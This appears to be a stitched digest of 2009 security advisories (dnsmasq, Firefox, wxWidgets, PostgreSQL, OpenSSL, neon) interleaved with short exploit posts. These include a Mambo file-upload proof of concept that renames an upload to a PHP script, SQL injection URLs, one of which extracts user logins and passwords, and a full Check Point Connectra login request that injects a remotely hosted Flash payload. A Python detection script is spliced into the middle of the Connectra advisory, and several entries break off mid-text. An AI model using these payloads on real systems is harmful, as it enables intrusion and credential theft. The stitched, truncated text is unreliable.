[ GLSA 200909-19 ] Dnsmasq: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200909-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Dnsmasq: Multiple vulnerabilities
      Date: September 20, 2009
      Bugs: #282653
        ID: 200909-19

Synopsis
========

Multiple vulnerabilities in Dnsmasq might result in the remote execution
of arbitrary code, or a Denial of Service.

Background
==========

Dnsmasq is a lightweight, easy to configure DNS forwarder and DHCP
server. It includes support for Trivial FTP (TFTP).

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  net-dns/dnsmasq       < 2.5.0                             >= 2.5.0

Description
===========

Multiple vulnerabilities have been reported in the TFTP functionality
included in Dnsmasq:

* Pablo Jorge and Alberto Solino discovered a heap-based buffer overflow
  (CVE-2009-2957).

* An anonymous researcher reported a NULL pointer dereference
  (CVE-2009-2958).

Impact
======

A remote attacker in the local network could exploit these
vulnerabilities by sending specially crafted TFTP requests to a machine
running Dnsmasq, possibly resulting in the remote execution of arbitrary
code with the privileges of the user running the daemon, or a Denial of
Service.

NOTE: The TFTP server is not enabled by default.

Workaround
==========

You can disable the TFTP server either at build time by not enabling the
tftp USE flag, or at runtime. Make sure --enable-tftp is not set in the
DNSMASQ_OPTS variable in the /etc/conf.d/dnsmasq file and enable-tftp is
not set in /etc/dnsmasq.conf, either of which would enable TFTP support
if it is compiled in.

Resolution
==========

All Dnsmasq users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-dns/dnsmasq-2.5.0"

References
==========

  [ 1 ] CVE-2009-2957
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2957
  [ 2 ] CVE-2009-2958
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2958

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Mambo 4.6.3 arbitrary file upload
Step 1) Using the POST method, send a file to:

  http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload

The file should have one of the following extensions: zip, doc, xls,
pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla

POC:

  <form action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload" method="post" enctype="multipart/form-data">
    <input type="file" name="NewFile"></input>
    <input type="submit" value="submit"></input>
  </form>

Step 2) Using a known bug in this version of Mambo, rename that file.

POC:

  http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=myscript.php%00.jpg&file[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.gif&file[NewFile][size]=1&CurrentFolder=

The path to UserFiles can be obtained using another known bug, which is
described here:

  http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded
Dawaween V 1.03 - SQL Injection Exploit
Discovered By: Dazz
Email: dazz.b...@hotmail.com
Script: Dawaween V 1.03
Search: Powered by Dawaween V 1.03

  http://www.example.com//poems/poems.php?division=sec&action=list&id=[sql]

WebSite: http://wwe.hostwq.net
rubrique 'rubrique.php' SQL Injection Vulnerability
Discovered By: CrAzY CrAcKeR
Email: CrAzY_CrAcKeR(at)hotmail(dot)com

Example:

  http://www.example.info/rubrique.php?id=-1+union+select+1,2,us_login,us_password,5,6,7,8,9,10,11,12,13,14+from+a_users_f
[ MDVSA-2009:236 ] firefox
Mandriva Linux Security Advisory                         MDVSA-2009:236
http://www.mandriva.com/security/

Package : firefox
Date    : September 20, 2009
Affected: 2009.0, 2009.1, Enterprise Server 5.0

Problem Description:

Security issues were identified and fixed in firefox 3.0.x:

Multiple unspecified vulnerabilities in the browser engine in Mozilla
Firefox before 3.0.14 allow remote attackers to cause a denial of
service (memory corruption and application crash) or possibly execute
arbitrary code via unknown vectors (CVE-2009-3069, CVE-2009-3070,
CVE-2009-3071, CVE-2009-3072).

Multiple unspecified vulnerabilities in the JavaScript engine in Mozilla
Firefox before 3.0.14 allow remote attackers to cause a denial of
service (memory corruption and application crash) or possibly execute
arbitrary code via unknown vectors (CVE-2009-3073, CVE-2009-3074,
CVE-2009-3075).

Mozilla Firefox before 3.0.14 does not properly implement certain
dialogs associated with the (1) pkcs11.addmodule and (2)
pkcs11.deletemodule operations, which makes it easier for remote
attackers to trick a user into installing or removing an arbitrary
PKCS11 module (CVE-2009-3076).

Mozilla Firefox before 3.0.14 does not properly manage pointers for the
columns (aka TreeColumns) of a XUL tree element, which allows remote
attackers to execute arbitrary code via a crafted HTML document, related
to a dangling pointer vulnerability (CVE-2009-3077).

Visual truncation vulnerability in Mozilla Firefox before 3.0.14 allows
remote attackers to trigger a vertical scroll and spoof URLs via
unspecified Unicode characters with a tall line-height property
(CVE-2009-3078).

Unspecified vulnerability in Mozilla Firefox before 3.0.14 allows remote
attackers to execute arbitrary JavaScript with chrome privileges via
vectors involving an object, the FeedWriter, and the BrowserFeedWriter
(CVE-2009-3079).

This update provides the latest Mozilla Firefox 3.0.x to correct these
issues.
Additionally, some packages which require it have been rebuilt and are
being provided as updates.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3069
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3070
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3071
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3072
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3073
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3074
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3075
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3077
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3078
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3079
http://www.mozilla.org/security/known-vulnerabilities/firefox30.html#firefox3.0.14

Updated Packages:
[SECURITY] [DSA 1890-1] New wxwidgets packages fix arbitrary code execution
Debian Security Advisory DSA-1890-1                   secur...@debian.org
http://www.debian.org/security/                        Giuseppe Iuculano
September 19, 2009                     http://www.debian.org/security/faq

Package        : wxwindows2.4 wxwidgets2.6 wxwidgets2.8
Vulnerability  : integer overflow
Problem type   : remote
Debian-specific: no
CVE Id         : CVE-2009-2369

Tielei Wang has discovered an integer overflow in wxWidgets, the
wxWidgets Cross-platform C++ GUI toolkit, which allows the execution of
arbitrary code via a crafted JPEG file.

For the oldstable distribution (etch), this problem has been fixed in
version 2.4.5.1.1+etch1 for wxwindows2.4 and version 2.6.3.2.1.5+etch1
for wxwidgets2.6.

For the stable distribution (lenny), this problem has been fixed in
version 2.6.3.2.2-3+lenny1 for wxwidgets2.6 and version
2.8.7.1-1.1+lenny1 for wxwidgets2.8.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 2.8.7.1-2 for wxwidgets2.8 and will be fixed soon for
wxwidgets2.6.

We recommend that you upgrade your wxwidgets packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
-------------------------------

Debian (oldstable)
------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64,
mips, mipsel, powerpc, s390 and sparc.
[UPRSN] Ubuntu Privacy Remix 9.04r2 fixes security issues
### UPR Security Notice UPRSN-09_01                  September 19, 2009
### several vulnerabilities

Ubuntu Privacy Remix (UPR), based on Ubuntu 9.04, is a live, read-only CD
that seals off your private data from the outside world to offer
protection against spying measures such as the German „Bundestrojaner“,
with which the German government and federal police try to spy on their
citizens. UPR does this using encryption and isolation methods. This
method of booting off a read-only CD provides an isolated and
unmodifiable system that is exceedingly difficult to compromise by
spyware.

The following security issues affect the Ubuntu Privacy Remix releases
prior to 9.04_r2. Ubuntu Privacy Remix 9.04_r2 can be downloaded from
https://www.privacy-cd.org/

Please note that all files are signed with the *new signing key*
2E887042.

A. UPR-specific
---------------

The UPR Team has released the second stable release of Ubuntu Privacy
Remix 9.04, which includes a new kernel to fix USN-819-1 (local root
privilege escalation). We think that this hole is very difficult to
exploit under the UPR environment; nevertheless we recommend all users
to use the new version.

B. Security Updates adopted from Ubuntu
---------------------------------------

All packages with security fixes in Ubuntu 9.04 until 09/01/2009 have
been updated.

See the complete changelog (new functions and features, bugfixes) here:
https://www.privacy-cd.org/en/using-upr/download

--
Ubuntu Privacy Remix Project
web: www.privacy-cd.org
mail: i...@privacy-cd.org
bugreports: https://bugs.launchpad.net/upr
signing_key: 1E8E7D6A | Fingerprint: C87A 673C 4EDD F7CC 5C89 4B77 7AC5 2496 1E8E 7D6A
communication_key: 85AC2E72 | Fingerprint: 83A9 0DE1 17B1 F74B 8E1A 0353 29E6 DD3E 85AC 2E72
[scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability
Check Point Connectra R62 Login Script Injection Vulnerability

scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020

I. INTRODUCTION

Check Point Connectra is a so-called SSL-VPN solution, which allows users
to access a remote system using a regular web browser. More information
is available on the official product web site at the following URL[1]:

http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enables an attacker to perform various
web-based attacks.

The initial logon script at /Login/Login, which is used by
unauthenticated users to log in, fails to perform proper input
validation on the data submitted via HTTP POST. While certain fields are
escaped before being sent back to the user's browser, the parameter
vpid_prefix lacks any validation and is therefore vulnerable to script
injection. Other parts of the application might be affected too.

This vulnerability has been tested on version R62; other versions might
be affected as well.

III. EXPLOITATION

Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using simple exploit strings containing substrings like
script, javascript, alert or similar. However, we consider this to be an
imperfect mechanism that is unable to prevent an attack using a more
sophisticated payload. For a selection, you might want to check RSnake's
popular XSS Cheat Sheet[2], which contains several patterns not detected
by the filter in place, allowing you to execute any arbitrary,
externally hosted payload. We exploited the vulnerability for a customer
in order to prove the possibility to capture usernames and passwords.

One of the possibilities mentioned above is to embed a remote Flash file
and grant it the permission to execute script code.

Vulnerable Variable Value:

  vpid_prefix = embed/src=http://www.scip.ch/p/s/w/ccs.swf; allowScriptAccess=alwaysa name=

--- CUT ---
POST https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153

loginType=Standard&userName=&vpid_prefix=embed/src=http://www.scip.ch/p/s/w/ccs.swf allowScriptAccess=alwaysa name=&password=&HeightData=1147&Login=Sign+In
--- CUT END ---

Response Snippet:

--- CUT ---
input type=hidden id=vpid_prefix name=vpid_prefix value=embed/src=http://www.scip.ch/p/s/w/ccs.swf; allowScriptAccess=alwaysa name=
--- CUT END ---

IV. IMPACT

Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attack. Due
to the fact that the application will often be allowed to make use of
ActiveX, it can also be used as a springboard to inject other payloads,
for example MS09-037[3] or any other recently disclosed vulnerability
that might be exploited using a web browser. Because other parts of the
application might be affected too (this could include some second order
vulnerabilities), a severe attack scenario might be possible.

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to form an HTML tag. In
some cases single (') or double quotes (") are required to inject the
code into a given HTML statement. Some implementations of security
systems also look for well-known attack tags such as script and attack
attributes such as onMouseOver. However, these are usually not capable
of identifying highly optimized payloads.

VI. SOLUTION

Check Point provides a hotfix for the vulnerability which should be
installed on vulnerable systems.

VII. VENDOR RESPONSE

Check Point acknowledged the problem and provides a hotfix for the
vulnerability. Detailed information on the issue, maintained by Check
Point, can be found at:

https://supportcenter.checkpoint.com/supportcenter/portal?solutionid=sk42793

VIII. SOURCES

scip AG - Security Consulting Information Process (German)
http://www.scip.ch/

scip AG Vulnerability
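The detection section above lists structural markers (angle brackets, quotes, tag names, event attributes) that survive payload variation far better than a keyword list does. The following Python is an added example, not scip AG's or Check Point's code: it runs a case-sensitive keyword list of the kind section III describes beside a structural check on the fully decoded parameter value, over constructed login POST bodies shaped like the request above. The appliance's real filter logic is not known, so the keyword model, the rule set, the sample bodies and the example.invalid host are all assumptions made for this example.

```python
"""Structural vs. keyword detection of script injection in login POST bodies.

Added example for the Connectra advisory above (not scip AG's or Check
Point's code).  Assumption: the appliance filter is modelled as a
case-sensitive substring list, which the advisory only describes loosely;
the sample bodies and the rule set below are constructed for this example.
"""
import html
import re
from urllib.parse import parse_qsl, unquote_plus

# Keyword list of the kind section III describes.  Case-sensitive on
# purpose: it shows how such a list stays silent on 'allowScriptAccess'.
BLACKLIST_WORDS = ("script", "javascript", "alert")

# Structural indicators from section V: characters that open or close a
# tag or break out of an attribute, tag-like tokens, event handlers and
# plugin attributes.  Constructed rule set, not a vendor signature.
MARKUP_CHARS = re.compile(r"""[<>"']""")
TAG_LIKE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*[\s/>]", re.I)
EVENT_ATTR = re.compile(r"\bon[a-z]+\s*=", re.I)
PLUGIN_ATTR = re.compile(r"\b(?:allowScriptAccess|src)\s*=", re.I)

# Parameters that should only ever hold plain text on this login form.
WATCHED_PARAMS = ("vpid_prefix", "userName")


def decode_value(raw: str, max_rounds: int = 3) -> str:
    """Undo repeated URL encoding, then HTML entities, before inspecting.

    parse_qsl() already decodes once; the loop catches double-encoded
    values that a filter matching on the wire form sees only as '%3C...'.
    """
    value = raw
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def keyword_filter_hit(value: str) -> bool:
    """Substring blacklist, modelling the check the advisory describes."""
    return any(word in value for word in BLACKLIST_WORDS)


def structural_hit(value: str) -> list:
    """Return the structural indicators present in the decoded value."""
    reasons = []
    if MARKUP_CHARS.search(value):
        reasons.append("markup-char")
    if TAG_LIKE.search(value):
        reasons.append("tag")
    if EVENT_ATTR.search(value):
        reasons.append("event-handler")
    if PLUGIN_ATTR.search(value):
        reasons.append("plugin-attr")
    return reasons


def inspect_body(body: str) -> dict:
    """Run both checks over every watched parameter of a form-encoded body."""
    findings = {}
    for name, raw in parse_qsl(body, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        value = decode_value(raw)
        findings[name] = {
            "keyword": keyword_filter_hit(value),
            "structural": structural_hit(value),
        }
    return findings


# Constructed request bodies in the shape of the Connectra login POST.
SAMPLE_BODIES = {
    "benign": ("loginType=Standard&userName=jdoe&vpid_prefix=corp-eu"
               "&password=x&HeightData=1147&Login=Sign+In"),
    # Plain script tag: both checks fire.
    "naive_script": ("loginType=Standard&userName=&vpid_prefix="
                     "%3Cscript%3Ealert(1)%3C/script%3E&password=&Login=Sign+In"),
    # Plugin-style value as in section III: the keyword list stays silent.
    "plugin_embed": ("loginType=Standard&userName=&vpid_prefix="
                     "%3Cembed/src%3Dhttp://example.invalid/x.swf+allowScriptAccess"
                     "%3Dalways%3E%3Ca+name%3D&password=&Login=Sign+In"),
    # Double URL-encoded: only visible after the extra decoding round.
    "double_encoded": ("loginType=Standard&userName=&vpid_prefix="
                       "%253Cimg+src%253Dx+onerror%253Dx%253E&password=&Login=Sign+In"),
}


def main() -> None:
    for label, body in SAMPLE_BODIES.items():
        result = inspect_body(body)["vpid_prefix"]
        print(f"{label:15} keyword={result['keyword']!s:5} "
              f"structural={','.join(result['structural']) or '-'}")


if __name__ == "__main__":
    main()
```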
[USN-834-1] PostgreSQL vulnerabilities
===========================================================
Ubuntu Security Notice USN-834-1                 September 21, 2009
postgresql-8.1, postgresql-8.3 vulnerabilities
CVE-2009-3229, CVE-2009-3230, CVE-2009-3231
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  postgresql-8.1                  8.1.18-0ubuntu0.6.06

Ubuntu 8.04 LTS:
  postgresql-8.3                  8.3.8-0ubuntu8.04

Ubuntu 8.10:
  postgresql-8.3                  8.3.8-0ubuntu8.10

Ubuntu 9.04:
  postgresql-8.3                  8.3.8-0ubuntu9.04

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that PostgreSQL could be made to unload and reload an
already loaded module by using the LOAD command. A remote authenticated
attacker could exploit this to cause a denial of service. This issue did
not affect Ubuntu 6.06 LTS. (CVE-2009-3229)

Due to an incomplete fix for CVE-2007-6600, RESET ROLE and RESET SESSION
AUTHORIZATION operations were allowed inside security-definer functions.
A remote authenticated attacker could exploit this to escalate
privileges within PostgreSQL. (CVE-2009-3230)

It was discovered that PostgreSQL did not properly perform LDAP
authentication under certain circumstances. When configured to use LDAP
with anonymous binds, a remote attacker could bypass authentication by
supplying an empty password. This issue did not affect Ubuntu 6.06 LTS.
(CVE-2009-3231)

Updated packages for Ubuntu 6.06 LTS:
[ MDVSA-2009:237 ] openssl
Mandriva Linux Security Advisory                         MDVSA-2009:237
http://www.mandriva.com/security/

Package : openssl
Date    : September 21, 2009
Affected: Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0

Problem Description:

Multiple vulnerabilities were discovered and corrected in openssl:

ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via a DTLS
ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386).

The NSS library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4
and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2
with X.509 certificates, which might allow remote attackers to spoof
certificates by using MD2 design flaws to generate a hash collision in
less than brute-force time. NOTE: the scope of this issue is currently
limited because the amount of computation required is still large
(CVE-2009-2409).

This update provides a solution to these vulnerabilities.
References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409

Updated Packages:
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
[USN-835-1] neon vulnerabilities
===========================================================
Ubuntu Security Notice USN-835-1                 September 21, 2009
neon, neon27 vulnerabilities
CVE-2008-3746, CVE-2009-2474
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libneon25                       0.25.5.dfsg-5ubuntu0.1

Ubuntu 8.04 LTS:
  libneon27                       0.27.2-1ubuntu0.1
  libneon27-gnutls                0.27.2-1ubuntu0.1

Ubuntu 8.10:
  libneon27                       0.28.2-2ubuntu0.1
  libneon27-gnutls                0.28.2-2ubuntu0.1

Ubuntu 9.04:
  libneon27                       0.28.2-6.1ubuntu0.1
  libneon27-gnutls                0.28.2-6.1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Joe Orton discovered that neon did not correctly handle SSL certificates
with zero bytes in the Common Name. A remote attacker could exploit this
to perform a man in the middle attack to view sensitive information or
alter encrypted communications.
Updated packages for Ubuntu 6.06 LTS:
[ MDVSA-2009:238 ] openssl
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

___

Mandriva Linux Security Advisory                         MDVSA-2009:238
http://www.mandriva.com/security/

___

Package : openssl
Date    : September 21, 2009
Affected: 2008.1, 2009.0, Enterprise Server 5.0

___

Problem Description:

Multiple vulnerabilities were discovered and corrected in openssl:

Use-after-free vulnerability in the dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL 1.0.0 Beta 2 allows remote attackers to cause a denial of service (openssl s_client crash) and possibly have unspecified other impact via a DTLS packet, as demonstrated by a packet from a server that uses a crafted server certificate (CVE-2009-1379).

ssl/s3_pkt.c in OpenSSL before 0.9.8i allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a DTLS ChangeCipherSpec packet that occurs before ClientHello (CVE-2009-1386).

The dtls1_retrieve_buffered_fragment function in ssl/d1_both.c in OpenSSL before 1.0.0 Beta 2 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an out-of-sequence DTLS handshake message, related to a fragment bug (CVE-2009-1387).

The NSS library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time. NOTE: the scope of this issue is currently limited because the amount of computation required is still large (CVE-2009-2409).

This update provides a solution to these vulnerabilities.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409

___

Updated Packages:

Mandriva Linux 2008.1:
4413a38da4754d54fc161e3c06b81c72  2008.1/i586/libopenssl0.9.8-0.9.8g-4.5mdv2008.1.i586.rpm
7994189a9bdff555fa34d763a9eec321  2008.1/i586/libopenssl0.9.8-devel-0.9.8g-4.5mdv2008.1.i586.rpm
bfd128daaf2831e0af5cfd5163067be9  2008.1/i586/libopenssl0.9.8-static-devel-0.9.8g-4.5mdv2008.1.i586.rpm
cb8236b62c2edba4033f1cafa39c4ce5  2008.1/i586/openssl-0.9.8g-4.5mdv2008.1.i586.rpm
e0a15b72d2ef1d458f259368042f6321  2008.1/SRPMS/openssl-0.9.8g-4.5mdv2008.1.src.rpm

Mandriva Linux 2008.1/X86_64:
f12af113949996063624f4c638d5c75c  2008.1/x86_64/lib64openssl0.9.8-0.9.8g-4.5mdv2008.1.x86_64.rpm
0a6db81684a049b45d4536d583864415  2008.1/x86_64/lib64openssl0.9.8-devel-0.9.8g-4.5mdv2008.1.x86_64.rpm
f4f9dd377c41a83af03efe923a0e106e  2008.1/x86_64/lib64openssl0.9.8-static-devel-0.9.8g-4.5mdv2008.1.x86_64.rpm
e317fbadd87171b291584a9275f6b656  2008.1/x86_64/openssl-0.9.8g-4.5mdv2008.1.x86_64.rpm
e0a15b72d2ef1d458f259368042f6321  2008.1/SRPMS/openssl-0.9.8g-4.5mdv2008.1.src.rpm

Mandriva Linux 2009.0:
62125f9fde11ecec42ae21075a34f4c7  2009.0/i586/libopenssl0.9.8-0.9.8h-3.4mdv2009.0.i586.rpm
4e21025e35ffefe8ab4b8a2d5368a450  2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.4mdv2009.0.i586.rpm
5887cbeeb89f1e9824868d977ae7c83e  2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.4mdv2009.0.i586.rpm
45cf6fd02fadbca35ccfc1dea1e1054e  2009.0/i586/openssl-0.9.8h-3.4mdv2009.0.i586.rpm
2942f8a0a8070f3a59d9bfc6c8fa50c5  2009.0/SRPMS/openssl-0.9.8h-3.4mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
287b7f8b3d478451e16b3e391e348c5e  2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.4mdv2009.0.x86_64.rpm
a7079cfda34bf4f4db722753244ee41b  2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.4mdv2009.0.x86_64.rpm
047265cc0d6ac4627f9d82c3b809f362  2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.4mdv2009.0.x86_64.rpm
9395a6acd0c2546f76da5a318d2f494f  2009.0/x86_64/openssl-0.9.8h-3.4mdv2009.0.x86_64.rpm
2942f8a0a8070f3a59d9bfc6c8fa50c5  2009.0/SRPMS/openssl-0.9.8h-3.4mdv2009.0.src.rpm

Mandriva Enterprise Server 5:
f7162720ce8713b9087cf91f7c2107c1  mes5/i586/libopenssl0.9.8-0.9.8h-3.4mdvmes5.i586.rpm
fb5183cd2e7adf3013f8224363cc5391  mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.4mdvmes5.i586.rpm
e3b7029bd10babd86023f2b3299ec957  mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.4mdvmes5.i586.rpm
4dc42b91974a65a75412896c0517a1ac  mes5/i586/openssl-0.9.8h-3.4mdvmes5.i586.rpm
ba1f57df4b57fe6ba79dd083a99c1b8d  mes5/SRPMS/openssl-0.9.8h-3.4mdvmes5.src.rpm

Mandriva Enterprise Server 5/X86_64:
d17052790ec6dbc7c98acbc552ed1d5a